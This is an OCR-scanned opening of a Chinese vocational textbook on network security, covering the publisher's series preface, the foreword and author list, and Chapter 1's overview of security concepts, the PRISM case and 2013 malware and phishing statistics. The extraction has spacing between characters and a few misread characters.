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内 容 简 介 


本 书 从 网 络 安全 的 角度 出 发 ， 全 面 介绍 网 络 安全 的 基本 理论 以 及 网 络 安全 方面 的 管理 、 配 置 和 维护 。 
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及 移动 互联 网 安全 的 相关 知识 。 各 章 后 都 编排 了 习题 ， 供 学 生 课 后 复习 与 巩固 所 学 知识 。 

本 书 注重 实用 性 ， 实 例 丰富 、 典 型 ， 实 训 内 容 和 案例 融合 在 课程 内 容 中 ， 从 而 将 理论 知识 与 实践 操作 
可 以 很 好 地 结合 起 来 。 

通过 本 书 的 学 习 , 读者 可 以 对 网 络 安全 有 一 个 基本 和 较 全 面 而 系统 的 认识 ， 同 时 可 以 学 会 使 用 网 络 安 
全 工具 。 本 书 可 作为 高 职高 专 计算 机 、 网 络 技术 、 电 子 商务 等 相关 专业 学 生 的 教材 ， 也 可 作为 相关 技术 人 
员 的 参考 书 或 培训 教材 。 
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礁 书 : 序 


一 、 编 写 目 的 


关于 立体 化 教材 , 国内 外 有 多 种 说 法 ,， 有 的 叫 “ 立 体 化 教材 ”， 有 的 叫 “ 一 体 化 教材 ”， 
有 的 叫 “ 多 元 化 教材 ”， 其 目的 是 一 样 的 ， 就 是 要 为 学 校 提供 一 种 教学 资源 的 整体 解决 方 
案 ， 最 大 限度 地 满足 教学 需要 ， 满 足 教育 市 场 需求 ， 促 进 教学 改革 。 我 们 这 里 所 讲 的 立体 
化 教材 ， 其 内 容 、 形 式 、 服 务 都 是 建立 在 当前 技术 水 平和 条 件 基础 上 的 。 

立体 化 教材 是 一 个 “一 揽 子 ” 式 的 ， 包 括 主教 材 、 教 师 参考 书 、 学 习 指导 书 、 试 题库 
在 内 的 完整 体系 。 主 教材 讲究 的 是 “精品 ”意识 ， 既 要 具备 指导 性 和 示范 性 ， 也 要 具有 一 
定 的 适用 性 ， 喜 新 不 厌 旧 。 那 种 内 容 越 编 越 多 ， 本 子 越 编 越 厚 的 低 水 平 重复 建设 在 “立体 
化 ”的 世界 中 将 被 扫地 出 门 。 和 以 往 不 同 ，“ 立 体 化 教材 ”中 的 教师 参考 书 可 不 是 千 人 一 
面 的 ， 教 师 参 考 书 不 只 是 提供 答案 和 注释 ， 而 是 含有 与 主教 材 配套 的 大 量 参 考 资料 ， 使 得 
老师 在 教学 中 能 做 到 “个 性 化 教学 ”。 学 习 指 导 书 更 像 一 本 明晰 的 地 图 册 ， 难 点 、 重 点 、 
学 习 方 法 一 目 了 然 。 试 题库 或 习题 集 则 要 完成 对 教学 效果 进行 测试 与 评价 的 任务 。 这 些 组 
成 部 分 采用 不 同 的 编写 方式 ， 把 教材 的 精华 从 各 个 角度 呈现 给 师 生 ， 既 有 重复 、 强 调 ， 又 
有 交叉 和 补充 ， 相 互 配合 ， 形 成 一 个 教学 资源 有 机 的 整体 。 

除了 内 容 上 的 扩充 ， 立 体 化 教材 的 最 大 突破 还 在 于 在 表现 形式 上 走出 了 “书本 ”这 一 
平面 媒介 的 局 限 ， 如 果 说 音像 制品 让 平面 书本 实现 了 第 一 次 “突围 ”， 那 么 电子 和 网 络 技 
术 的 大 量 运用 就 让 躺 在 书桌 上 的 教材 真正 “ 活 ” 了 起 来 。 用 PowerPoint 开发 的 电子 教案 不 
仅 大 大 减少 了 教师 案头 备课 的 时 间 ， 而 且 也 让 学 生 的 课 后 复习 更 加 有 的 放 矢 。 电 子 图 书 通 
过 数字 化 使 得 教材 的 内 容 得 以 无 限 扩张 ， 使 平面 教材 更 能 发 挥 其 提纲 击 领 的 作用 。 

CAI 课件 把 动画 、 仿 真 等 技术 引入 了 课堂 ， 让 课程 的 难点 和 重点 一 目 了 然 ， 通 过 生动 
的 表达 方式 达到 深入 浅 出 的 目的 。 在 科学 指标 体系 控制 之 下 的 试题 库 既 可 以 轻而易举 地 制 
作 标准 化 试卷 ， 也 能 让 学 生 进行 模拟 实战 的 在 线 测试 ， 提 高 了 教学 质量 评价 的 客观 性 和 及 
时 性 。 网 络 课程 更 厉害 ， 它 使 教学 突破 了 空间 和 时 间 的 限制 ， 彻 底 发 挥 了 立体 化 教材 本 身 
的 潜力 ， 轻 轻 敲 击 几 下 键盘 ， 你 就 能 在 任何 时 候 得 到 有 关 课 程 的 全 部 信息 。 

最 后 还 有 资料 库 ， 它 把 教学 资料 以 知识 点 为 单位 ， 通 过 文字 、 图 形 、 图 像 、 音 频 、 视 
频 、 动 画 等 各 种 形式 ， 按 科学 的 存储 策略 组 织 起 来 ， 大 大 方便 了 教师 在 备课 、 开 发 电子 教 
案 和 网 络 课程 时 的 教学 工作 。 如 此 一 来 ， 教 材 就 “ 活 ” 了 。 学 生 和 书本 之 间 的 关系 不 再 像 
领导 与 被 领导 那样 呆板 ， 而 是 真正 有 了 互动 。 教材 不 再 只 为 教师 们 规定 什么 重要 什么 不 重 
要 ， 而 是 成 为 教师 实现 其 教学 理念 的 最 佳 拍档 。 在 建设 观念 上 ， 从 提供 和 出 版 单一 纸 质 教 
材 转向 提供 和 出 版 较 完整 的 教学 解决 方案 ; 在 建设 目标 上 ， 以 最 大 限度 满足 教学 要 求 为 根 
本 出 发 点 ; 在 建设 方式 上 ， 不 单纯 以 现 有 教材 为 核心 ， 简 单 地 配套 电子 音像 出 版 物 ， 而 是 
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以 课程 为 核心 ， 整 合 已 有 资源 并 聚拢 新 资源 。 

网 络 化 、 立 体 化 教材 的 出 版 是 我 社 下 一 阶段 教材 建设 的 重 中 之 重 ， 作 为 以 计算 机 教材 
出 版 为 龙头 的 清华 大 学 出 版 社 确立 了 “改变 思想 观念 ， 调 整 工作 模式 ， 构 建立 体 化 教材 体 
系 ， 大 幅度 提高 教材 服务 ”的 发 展 目标 。 并 提出 了 首先 以 建设 “高 职高 专 计算 机 立体 化 教 
材 ” 为 重点 的 教材 出 版 规划 , 希望 通过 邀请 全 国 范 围 内 的 高 职高 专 院 校 的 优秀 教师 , 在 2008 
年 共同 策划 、 编 写 这 一 套 高 职高 专 立体 化 教材 ， 利 用 网 络 等 现代 技术 手段 实现 课程 立体 化 
教材 的 资源 共享 ， 解 决 国内 教材 建设 工作 中 存在 教材 内 容 的 更 新 滞后 于 学 科 发 展 的 状况 。 
把 各 种 相互 作用 、 相 互联 系 的 媒体 和 资源 有 机 地 整合 起 来 ， 形 成 立体 化 教材 ， 把 教学 资料 
以 知识 点 为 单位 ， 通 过 文字 、 图 形 、 图 像 、 音 频 、 视 频 、 动 画 等 各 种 形式 ， 按 科学 的 存储 
策略 组 织 起 来 ， 为 高 职高 专 教学 提供 一 整套 解决 方案 。 


二 、 教 材 特点 


在 编写 思想 上 ， 以 适应 高 职高 专 教学 改革 的 需要 为 目标 ， 以 企业 需求 为 导向 ， 充 分 吸 
收 国外 经 典 教材 及 国内 优秀 教材 的 优点 ， 结 合 中 国 高 校 计算 机 教育 的 教学 现状 ， 打 造 立 体 
化 精品 教材 。 

在 内 容 安 排 上 ， 充 分 体现 先进 性 、 科 学 性 和 实用 性 ， 尽 可 能 选取 最 新 、 最 实用 的 技术 ， 
并 依照 学 生 接 受 知识 的 一 般 规律 , 通过 设计 详细 的 可 实施 的 项 目 化 案例 (而 不 仅仅 是 功能 性 
的 小 例子 )， 帮 助 学 生 掌握 要 求 的 知识 点 。 

在 教材 形式 上 ， 利 用 网 络 等 现代 技术 手段 实现 立体 化 的 资源 共享 ， 为 教材 创建 专门 的 
网 站 ， 并 提供 题库 、 素 材 、 录 像 、CAI 课件 、 案 例 分 析 ， 实 现 教师 和 学 生 在 更 大 范围 内 的 
教 与 学 互动 ， 及 时 解决 教学 过 程 中 遇 到 的 问题 。 

本 系列 教材 采用 案例 式 的 教学 方法 ， 以 实际 应 用 为 主 ， 理 论 够 用 为 度 。 

本 系列 教材 将 提供 全 方位 、 立 体 化 的 服务 。 网 上 提供 电子 教案 、 文 字 或 图 片 素材 、 源 
代码 、 在 线 题库 、 模 拟 试卷 、 习 题 答案 等 。 

在 为 教学 服务 方面 ， 主 要 是 通过 教学 服务 专用 网 站 在 网 络 上 为 教师 和 学 生 提 供 交 流 的 
场所 ， 每 个 学 科 、 每 门 课程 ， 甚 至 每 本 教材 都 建立 网 络 上 的 交流 环境 。 可 以 为 广大 教师 信 
息 交 流 、 学 术 讨 论 、 专 家 咨询 提供 服务 ， 也 可 以 让 教师 发 表 对 教材 建设 的 意见 ， 甚 至 通过 
网 络 授课 。 对 学 生来 说 ， 则 可 以 在 教学 支撑 平台 上 所 提供 的 自主 学 习 空间 上 来 实现 学 习 、 
答疑 、 作 业 、 讨 论 和 测试 ， 当 然 也 可 以 对 教材 建设 提出 意见 。 这 样 ， 在 编辑 、 作 者 、 专 家 、 
教师 、 学 生 之 间 建 立 起 一 个 以 课本 为 依据 、 以 网 络 为 纽带 、 以 数据 库 为 基础 、 以 网 站 为 门 
户 的 立体 化 教材 建设 与 实践 的 体系 ， 用 快捷 的 信息 反馈 机 制 和 优质 的 教学 服务 促进 教学 
改革 。 


前 言 


计算 机 网 络 安全 已 引起 世界 各 国 的 广泛 关注 ， 我 国 也 在 高 等 教育 中 不 断 增加 计算 机 网 
络 安全 方面 的 基础 知识 和 网 络 安全 技术 应 用 知识 。 随 着 网 络 高 新 技术 的 不 断 发 展 ， 社 会 经 
济 的 建设 与 发 展 越 来 越 依赖 于 计算 机 网 络 。 与 此 同时 ， 网 络 中 的 不 安全 因素 对 国民 经 济 的 
威胁 ， 甚 至 对 国家 和 地 区 的 威胁 也 日 益 严重 。 加 快 培养 网 络 安全 方面 的 应 用 型 人 才 、 广 泛 
普及 网 络 安全 知识 和 掌握 网 络 安全 技术 就 突显 重要 。 本 书 是 在 广泛 调研 和 充分 论证 的 基础 
上 ， 结 合 当前 应 用 最 为 广泛 的 网 络 攻防 技术 实例 ， 并 通过 研究 实践 而 形成 的 一 本 高 职高 专 
计算 机 及 相关 专业 网 络 安全 课程 的 教材 ， 全 书 较 系统 而 全 面 地 介绍 了 网 络 安全 与 管理 方面 
的 相关 内 容 ， 并 适当 地 安排 了 实 训 内 容 ， 旨 在 使 读者 能 够 综合 运用 书 中 所 讲授 的 知识 进行 
网 络 安全 与 管理 方面 的 实践 。 

本 书 以 培养 应 用 型 和 技能 型 人 才 为 根本 ， 通 过 认识 、 实 践 、 总 结 和 提高 这 样 一 个 认 知 
过 程 ， 精 心 组 织 学 习 内 容 ， 图 文 并 茂 、 深 入 浅 出 ， 全 面 适应 社会 发 展 的 需要 ， 符 合 高 等 职 
业 教育 教学 改革 规律 及 发 展 趋势 ， 力 求 内 容 先 进 实用 ， 并 有 所 创新 。 全 书 共 分 10 章 : 第 1 
章 全 面 分 析 计 算 机 网 络 的 基本 安全 问题 ， 介 绍 网 络 安全 的 基本 概念 、 内 容 和 方法 ， 以 及 当 
前 病毒 发 展 的 趋势 和 最 新 的 防 病毒 技术 ; 第 2 章 重 点 介绍 网 络 攻击 与 防范 措施 ， 第 3 章 介 
绍 拒绝 服务 与 数据 库 安全 相关 知识 ; 第 4 章 重 点 介绍 计算 机 病毒 与 木马 的 概念 ， 以 及 攻击 
防范 技术 ; 第 5 章 重 点 介绍 入 侵 与 攻击 的 基本 概念 ， 典 型 的 攻击 方法 和 原理 ， 以 及 入 侵 检 
测 方法 等 基本 内 容 ; 第 6 章 主 要 介绍 加 密 技术 与 虚拟 专用 网 的 相关 知识 ， 第 7 章 介绍 防火 
墙 的 概念 、 设 计 原 理 与 应 用 案例 ， 第 8 章 介 绍 网 络 应 用 服务 安全 配置 技术 ; 第 9 章 介绍 无 
线 网 络 安全 的 相关 知识 ; 第 10 章 介绍 移动 互联 网 安全 的 相关 知识 。 

本 书 第 1 版 主要 由 山东 水 利 职业 学 院 的 老师 编写 完成 。 本 书 的 第 2 版 在 改版 之 初 ， 有 
计划 地 深入 互联 网 企业 调研 ， 收 集 素材 ， 并 进行 分 析 整 理 ， 同 时 针对 日 益 严 峻 的 网 络 安全 
现状 和 移动 互联 网 飞速 发 展 的 形势 ， 更 是 为 了 在 教材 中 融入 最 新 的 网 络 安全 知识 ， 邀 请 了 
几 位 互联 网 企业 专家 参加 了 教材 的 编写 和 指导 工作 ， 具 体 工作 完成 情况 如 下 。 

全 书 由 张 典 明 策划 、 组 织 编写 、 修 改 校对 和 统 稿 。 第 1 章 由 张 典 明 编写 ,， 第 2 章 由 金 
山 安全 中 心 张 民 松 编写 ， 第 3 章 由 陈 绪 乾 老师 与 山东 浪潮 齐鲁 软件 产业 股份 有 限 公司 刘 伟 
峰 共 同 编写 ， 第 4 章 由 王 妍 编写 ， 第 5 章 由 钱 玉霞 编写 ， 第 6 章 由 刘 春 燕 编 写 ， 第 7 章 由 
黄山 编写 , 第 8 章 由 张 鹏 编写 ， 第 9 章 由 杨辉 编写 ， 第 10 章 由 浪潮 通信 信息 系统 有 限 公司 
杨 士 强 编写 。 

限于 编者 的 水 平 ， 书 中 有 不 当 甚至 错误 之 处 ， 诚 县 广大 读者 提出 宝贵 意见 。 
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第 1 章 网 络 安全 概述 


【本 章 要 点 】 

通过 本 章 的 学 习 ， 可 以 了 解 网 络 安全 的 现状 及 发 展 趋势 ， 掌 握 其 定义 。 了 解 网 络 安全 
主要 表现 的 几 个 方面 : 网 络 的 物理 安全 、 网 络 拓扑 结构 安全 、 网 络 系统 安全 、 应 用 系统 安 
全 和 网 络 管理 安全 等 。 了 解 当前 最 先进 的 反 病 毒 技 术 。 


1.1 ”网络 安全 的 内 涵 


近年 来 ， 随 着 计算 机 和 网 络 技术 在 社会 生活 各 方面 的 广泛 应 用 ， 计 算 机 和 计算 机 网 络 
已 经 成 为 人 们 生活 中 不 可 或 缺 的 重要 组 成 部 分 。 计 算 机 网 络 具 有 的 开放 性 、 交 互 性 和 分 散 
性 等 特点 ， 使 其 很 容易 受到 干扰 和 攻击 。 计 算 机 网 络 安 全 是 一 门 涉及 计算 机 科学 、 网 络 技 
术 、 通 信 技 术 、 密 码 技术 、 信 息 安全 技术 、 应 用 数学 和 信息 论 等 多 种 学 科 的 综合 性 学 科 ， 
其 本 身 包 括 的 范围 很 大 ， 大 到 国家 军事 政治 机 密 等 安全 ， 小 到 防范 商业 企业 机 密 泄露 、 防 
范 青少年 对 不 良 信息 的 浏览 、 个 人 信息 的 泄露 等 。 随 着 大 数据 时 代 的 到 来 ， 信 息 量 呈现 高 
速 增长 ， 人 们 对 网 络 信息 安全 给 予 了 前 所 未 有 的 关注 。 每 年 发 生 的 网 络 信息 安全 事件 更 是 
不 计 其 数 ， 如 今 信息 泄露 、 黑 客 攻击 和 病毒 入 侵 等 均 成 为 网 络 安全 的 主要 威胁 。 

美国 的 “棱镜 门 ”事件 ， 更 是 敲 响 了 全 球 网 络 信息 安全 的 警钟 。2013 年 6 月 ， 据 《 华 
盛 顿 邮 报 》 报 道 ， 美 国 国家 安全 局 (以 下 简称 NSA) 和 联邦 调查 局 (以 下 简称 FBD 正 在 通过 一 
个 代号 为 PRISM( 棱 镜 ) 的 机 密 项 目 , 参加 PRISM 项 目的 科技 公司 包括 硅谷 最 具 主导 地 位 的 
企业 ， 这 些 企业 的 logo 都 出 现在 该 项 目的 花 名 册 上 ， 包 括 微软 、 雅 虎 、 谷 歌 、Facebook、 
PalTalk、AOL、Skype、YouTube 与 苹果 公司 。 

棱镜 计划 (PRISM) 是 一 项 由 美国 国家 安全 局 (NSA) 自 2007 年 起 开始 实施 的 绝密 电子 监 
听 计 划 ， 该 计划 的 正式 名 号 为 US-984XN。 

据 报 道 ，PRISM 计划 能 够 对 从 手机 到 服务 器 ， 从 办 公 软 件 到 操作 系统 ， 从 搜索 引擎 到 
无 线 通信 技术 等 进行 深度 的 监听 。 许 可 的 监听 对 象 包括 : 任何 在 美国 以 外 地 区 使 用 参与 该 
计划 公司 服务 的 客户 ， 或 是 任何 与 国外 人 士 通信 的 美国 公民 。 受 到 美国 国家 安全 局 监控 的 
主要 有 10 类 信息 : 电子 邮件 、 即 时 消息 、 视 频 、 照 片 、 存 储 数据 、 语 音 聊天 、 文 件 传输 、 
视频 会 议 、 登 录 时 间 和 社交 网 络 资料 。 通 过 PRISM 项 目 , 美国 国家 安全 局 甚至 可 以 实时 监 
控 一 个 人 正在 进行 的 网 络 搜索 内 容 。 

有 关 PRISM 的 报道 是 在 美国 政府 持续 秘密 地 要 求 威 讯 (Verizon) 向 国家 安全 局 提供 所 有 
客户 每 日 电话 记录 的 消息 曝光 后 不 久 出 现 的 。 泄 露 这 些 绝密 文件 的 是 美国 中 情 局 前 技术 助 
理 爱德华 斯 诺 登 ， 他 原本 在 夏威夷 的 国家 安全 局 办 公 室 工作 , 在 2013 年 5 月 将 文件 复制 
后 前 往 香 港 并 将 文件 公开 。 据 悉 ， 仅 2012 年 ， 综 合 情 报 文件 (总 统 每 日 简报 ) 就 在 1 477 个 
计划 中 使 用 了 来 自 PRISM 计划 的 资料 。 

目前 , 美国 著名 IT 公司 的 业务 几乎 渗透 到 了 中 国 网 络 的 每 一 个 环节 , 鉴于 上 述 的 事件 ， 
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我 们 应 如 何 来 保障 网 络 安全 呢 ? 
1.1.1 网 络 安全 的 定义 


网 络 安全 是 指 网 络 系统 的 硬件 、 软 件 及 其 系统 中 的 数据 受到 保护 ， 不 因 偶 然 的 或 者 恶 
意 的 原因 而 遭受 破坏 、 更 改 和 泄露 ， 网 络 安全 从 其 本 质 上 来 讲 就 是 网 络 上 的 信息 安全 。 从 
广义 来 说 ， 凡 是 涉及 网 络 上 信息 的 保密 性 、 完 整 性 、 可 用 性 、 真 实 性 和 可 控 性 的 相关 技术 
和 理论 都 是 网 络 安全 的 研究 领域 。 

网 络 安全 涉及 的 内 容 既 有 技术 方面 的 问题 ， 也 有 管理 方面 的 问题 ， 两 方面 相互 补充 ， 
缺 一 不 可 。 技 术 方 面 主要 侧重 于 如 何 防范 外 部 非法 攻击 ， 管 理 方面 则 侧重 于 内 部 人 为 因素 
的 管理 。 如 何 更 有 效 地 保护 重要 的 信息 数据 、 提 高 计算 机 网 络 系统 的 安全 性 已 经 成 为 所 有 
计算 机 网 络 应 用 都 必须 考虑 和 解决 的 一 个 重要 问题 。 


1.1.2 网络 安全 的 特征 


网 络 安全 一 般 应 包括 以 下 五 个 基本 特征 。 

(1) 保密 性 : 确保 信息 不 泄露 给 非 授权 用 户 。 

(2) 完整 性 : 确保 数据 未 经 授权 不 能 进行 改变 的 特性 。 即 信息 在 存储 或 传输 过 程 中 保 
持 不 被 修改 、 不 被 破坏 和 丢失 的 特性 。 

G) 可 用 性 : 确保 可 被 授权 实体 访问 并 按 需 求 使 用 的 特性 。 即 当 需 要 时 能 否 存 取 所 需 
的 信息 。 例 如 网 络 环境 下 拒绝 服务 、 破 坏 网 络 和 有 关系 统 的 正常 运行 等 都 属于 对 可 用 性 的 
攻击 。 

(4) 可 控 性 : 确保 对 信息 的 传播 及 内 容 具 有 控制 能 力 。 

(5) 可 审查 性 : 确保 出 现 安全 问题 时 提供 依据 与 手段 。 


1.2 网络 安全 分 析 


从 网 络 运行 和 管理 者 的 角度 说 ， 他 们 希望 对 本 地 网 络 信息 的 访问 、 读 写 等 操作 受到 保 
护 和 控制 ， 避 免 出 现 病毒 、 非 法 存 取 、 拒 绝 服务 、 网 络 资源 非法 占用 和 非法 控制 等 威胁 ， 
制止 和 防御 网 络 黑客 的 攻击 。 对 安全 保密 部 门 来 说 ， 他 们 希望 对 非法 的 、 有 害 的 或 涉及 国 
家 安全 的 信息 进行 过 滤 和 防 堵 ， 避 免 机 要 信息 泄露 ， 避 免 对 社会 造成 危害 、 给 国家 造成 巨 
大 损失 。 从 社会 教育 和 意识 形态 角度 来 讲 ， 网 络 上 不 健康 的 内 容 ， 会 对 社会 的 稳定 和 人 类 
的 发 展 造成 阻碍 ， 必 须 对 其 进行 控制 。 

随 着 计算 机 技术 的 迅速 发 展 ， 在 计算 机 上 处 理 的 业务 也 由 基于 单机 的 数学 运算 、 文 件 
处 理 ， 基 于 简单 连接 的 内 部 网 络 的 内 部 业务 处 理 、 办 公 自 动 化 等 发 展 到 基于 复杂 的 内 部 
网 (Intranet)、 企业 外 部 网 (Extranet)、 全球 互联 网 (Intemet) 的 企业 级 计算 机 处 理 系统 和 世界 范 
围 内 的 信息 共享 和 业务 处 理 。 在 系统 处 理 能 力 提高 的 同时 ， 系 统 的 连接 能 力也 在 不 断 的 提 
高 。 但 在 连接 能 力 信 息 、 流 通 能 力 提高 的 同时 ， 基 于 网 络 连 接 的 安全 问题 也 日 益 突出 ， 整 
体 的 网 络 安全 主要 表现 在 以 下 几 个 方面 : 网 络 的 物理 安全 、 网 络 拓扑 结构 安全 、 网 络 系统 
安全 、 应 用 系统 安全 和 网 络 管理 安全 等 。 
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对 于 网 络 安全 问题 ， 为 了 防 患 于 未 然 ， 首 先 要 了 解 网 络 安全 的 根源 ， 然 后 制定 相应 的 
安全 策略 ， 做 到 事前 主动 防御 、 事 发 灵活 控制 和 事后 分 析 追 踪 。 


1.2.1 物理 安全 


网 络 的 物理 安全 是 整个 网 络 系统 安全 的 前 提 ， 也 是 整个 组 织 安全 策略 的 基本 元 素 。 总 
体 来 说 ， 物 理 安全 的 风险 主要 有 : 地 震 、 水 灾 、 火 灾 等 环境 事故 ， 电 源 故 障 ， 人 为 操作 失 
误 或 错误 ， 设 备 被 盗 、 被 毁 ; 电磁 干扰 ， 线 路 截获 等 。 因 此 要 尽量 避免 网 络 的 物理 安全 风 
险 , 对 于 足够 敏感 的 数据 和 一 些 关 键 的 网 络 基础 设施 , 可 以 在 物理 上 和 多 数 公 司 用 户 分 开 ， 
并 采用 增加 的 身份 验证 技术 (如 智能 卡 登录 、 生 物 验证 技术 等 ) 控 制 用 户 对 其 物理 上 的 访问 ， 
从 而 减少 安全 破坏 的 可 能 性 。 


1.2.2 ”网 络 结构 安全 


网 络 拓扑 结构 设计 也 会 直接 影响 网 络 系统 的 安全 性 。 当 外 部 与 内 部 网 络 进行 通信 时 ， 
内 部 网 络 的 机 器 安全 就 会 受到 威胁 ， 同 时 也 可 能 影响 在 同一 网 络 上 的 许多 其 他 系统 。 通 过 
网 络 传播 ， 还 会 影响 到 连 上 Internet/Intranet 的 其 他 网 络 ， 因 此 ， 我 们 在 设计 时 有 必要 将 公 
开 服 务 器 (WEB、DNS、EMAIL 等 ) 和 外 网 及 内 部 其 他 业务 网 络 进行 必要 的 隔离 ， 避 免 网 络 
结构 信息 外 泄 ， 同 时 还 要 对 外 网 的 服务 请 求 加 以 过 滤 ， 只 允许 正常 通信 的 数据 包 到 达 相 应 
主机 ， 其 他 的 请 求 服务 在 到 达 主机 之 前 就 应 该 被 拒绝 。 


1.2.3 ”系统 安全 


系统 的 安全 是 指 整个 网 络 操作 系统 和 网 络 硬 件 平 台 是 否 可 靠 且 值得 信任 。 不 管 基于 桌 
面 的 操作 系统 还 是 基于 网 络 的 操作 系统 ， 都 不 可 避免 地 存在 诸多 的 安全 隐患 ， 如 非法 存 取 、 
远程 控制 、 缓 冲 区 溢出 以 及 系统 后 门 等 ， 从 各 个 操作 系统 厂商 不 断 发 布 的 安全 公告 以 及 系 
统 补丁 可 见 一 二 。 可 以 确切 地 说 ， 没 有 完全 安全 的 操作 系统 。 不 同 的 用 户 应 从 不 同 的 方面 
对 其 网 络 作 详 尽 的 分 析 ， 选 择 安全 性 尽 可 能 高 的 操作 系统 。 因 此 不 但 要 选用 尽 可 能 可 靠 的 
操作 系统 和 硬件 平台 ， 并 对 操作 系统 进行 安全 配置 。 而 且 ， 必 须 加 强 登录 过 程 的 认证 (特别 
是 在 到 达 服 务 器 主机 之 前 的 认证 )， 确 保 用 户 的 合法 性 ; 其 次 应 该 严格 限制 登录 者 的 操作 权 
限 ， 将 其 能 完成 的 操作 限制 在 最 小 的 范围 内 。 


1.2.4 应 用 系统 安全 
应 用 系统 的 安全 跟 具 体 的 应 用 有 关 ， 涉 及 面 广 。 应 用 系统 的 安全 是 动态 的 。 应 用 的 安 
全 性 也 涉及 信息 的 安全 性 ， 并 包括 很 多 方面 。 


1. 应 用 系统 的 安全 是 动态 的 、 不 断 变化 的 


应 用 程序 配置 和 漏洞 通常 是 恶意 软件 攻击 或 利用 的 目标 。 如 攻击 者 可 以 通过 诱 使 用 户 
打开 受 感染 的 电子 邮件 附件 攻击 系统 或 使 恶意 软件 在 整个 网 络 上 传播 。 而 其 他 如 WWW 服 
务 、 即 时 通信 、FTP 服务 以 及 DNS 服务 等 都 存在 不 同 程度 的 安全 漏洞 ， 只 有 通过 专业 的 安 
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全 工具 不 断 发 现 漏洞 、 修 补漏 洞 ， 提 高 系统 的 安全 性 ， 才 能 有 效 防止 恶意 的 攻击 。 

2. 应 用 的 安全 性 涉及 信息 、 数 据 的 安全 性 

信息 的 安全 性 涉及 机 密 信息 泄露 、 未 经 授权 的 访问 、 假 冒 信 息 、 破 坏 信息 完整 性 、 破 
坏 系统 的 可 用 性 等 。 在 某 些 网 络 系统 中 ， 涉 及 很 多 机 密 信 息 ， 如 果 一 些 重要 信息 被 窃取 或 
破坏 ， 在 经 济 、 社 会 和 政治 方面 将 造成 严重 的 影响 。 因 此 ， 对 用 户 使 用 计算 机 必须 进行 身 
份 认 证 ， 对 于 重要 信息 的 通信 必须 授权 ， 传 输 必 须 加 密 ; 采用 多 层次 的 访问 控制 与 权限 控 
制 手段 ， 实 现 对 数据 的 安全 保护 ， 采 用 加 密 技术 ， 保 证 网 上 传输 信息 包括 管理 员 口 令 与 账 
户 、 上 传 信息 等 的 机 密 性 与 完整 性 。 


1.2.5 ”管理 的 安全 


管理 是 网 络 安全 最 重要 的 部 分 。 责 权 不 明 ， 安 全 管理 制度 不 健全 及 缺乏 可 操作 性 等 都 
可 能 引起 管理 安全 的 风险 。 当 网 络 出 现 攻击 行为 或 网 络 受到 其 他 一 些 安全 威胁 时 (如 内 部 人 
员 的 违规 操作 等 )， 无 法 进行 实时 的 检测 、 监 控 、 报 告 与 预警 。 同 时 ， 当 事故 发 生 后 ， 也 无 
法 提供 黑客 攻击 行为 的 追踪 线索 及 破案 依据 ， 即 缺乏 对 网 络 的 可 控 性 与 可 审查 性 。 这 就 要 
求 我 们 必须 对 站 点 的 访问 活动 进行 多 层次 的 记录 ， 及 时 发 现 非法 入 侵 行为 。 

建立 全 新 网 络 安全 机 制 ， 必 须 深刻 理解 网 络 并 能 提供 直接 的 解决 方案 。 因 此 ， 最 可 行 
的 做 法 是 把 健全 的 管理 制度 和 严格 管理 相 结 合 。 保 障 网 络 的 安全 运行 ， 使 其 成 为 一 个 具有 
良好 的 安全 性 、 可 扩充 性 和 易 管理 性 的 信息 网 络 。 一 旦 上 述 的 安全 隐患 成 为 事实 ， 所 造成 
的 对 整个 网 络 的 损失 都 是 难以 估计 的 。 因 此 ， 网 络 的 安全 建设 是 局 域 网 建设 过 程 中 重要 的 
一 环 。 


1.3 网络 安 全 的 现状 和 发 展 趋势 


1.3.1 概况 


内 多 家 著名 互联 网 安全 企业 都 对 2013 年 上 半年 互联 网 信息 安全 现状 与 趋势 从 不 同 
的 方面 进行 了 统计 、 研 究 和 分 析 。 


1. 360 安全 中 心 


仅 2013 年 第 二 季度 ，360 互联 网 安全 中 心 共 截 获 新 增 恶意 程序 样本 5.27 亿 个 , 同比 增 
长 112.5%， 环 比 增长 32.4%， 恶 意 程序 样本 量 的 快速 增长 态势 令 人 担忧 。 其 中 盗号 木马 仍 
然 是 对 用 户 威胁 最 大 的 恶意 程序 。 此 外 ， 流 量 型 木马 也 活动 猩 狐 ， 这 类 木马 以 后 台 静 默 的 
方式 为 网 站 刷 广告 ， 或 动 持 浏览 器 主页 推广 不 良 网 址 导航 ， 这 也 是 木马 产业 链 的 主要 牟利 
方式 。 而 可 被 黑客 用 于 远程 操控 用 户 电脑 的 后 门 病毒 也 重新 活跃 起 来 ， 对 网 民 上 网 构成 了 
巨大 的 安全 威胁 ， 值 得 高 度 和 警惕。 

从 攻击 目标 来 看 , 各 种 游戏 盗号 木马 仍然 是 最 为 活跃 的 木马 类 别 , 这 其 中 又 以 DNF 游 
戏 的 盗号 木马 最 为 突出 。 

从 风险 人 群 和 高 危 人 群 的 比例 分 布 上 看 , 广东 是 2013 年 第 二 季度 中 国 上 网 最 不 安全 的 
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省 级 行政 区 ， 而 香港 、 澳 门 、 北 京 、 上 海 和 西藏 是 二 季度 中 国 上 网 最 安全 的 省 级 行政 区 。 

挂 马 网 站 数量 继续 减少 ， 新 增 钓鱼 网 站 数量 虽然 同比 增长 了 180.9%, 但 环比 却 下 降 了 
34.6%; 虚假 购物 、 模 仿 登 录 和 虚假 中 奖 仍然 是 新 增 钓鱼 网 站 的 主要 类 型 ; 而 从 单个 钓鱼 网 
站 的 拦截 量 来 看 ， 排 名 前 20 的 钓鱼 网 站 以 境外 彩票 网 站 和 假 医 假 药 网 站 为 主 。 

美国 仍然 是 中 国 钓 鱼网 站 的 主要 源头 ， 占 比 高 达 38.0%; 同时 北美 其 他 地 区 和 中 国内 
地 的 钓鱼 网 站 数量 增长 迅速 ， 占 比分 别 为 30.3% 和 15.7%; 来 自 韩国 的 钓鱼 网 站 数量 较 一 
季度 大 幅 减少 。 

美 联 社 Twitter 账户 被 黑 ，IE8 爆 出 “劳动 节 水 坑 ” 漏 洞 以 及 美国 黑客 组 织 从 ATM 窃 
取 4500 万 美元 等 网 络 攻击 事件 ,成 为 2013 年 第 二 季度 最 值得 关注 的 国际 互联 网 安全 事件 。 

犯罪 分 子 利用 超级 网 银 的 安全 风险 进行 巨额 欺诈 ， 通 过 CSRF 链接 攻击 用 户 末端 路 由 
器 , 以 及 网 上 兼职 欺诈 泛滥 成 灾 , 成 为 2013 年 第 二 季度 最 值得 关注 的 国内 互联 网 安全 事件 。 


2. 瑞星 公司 


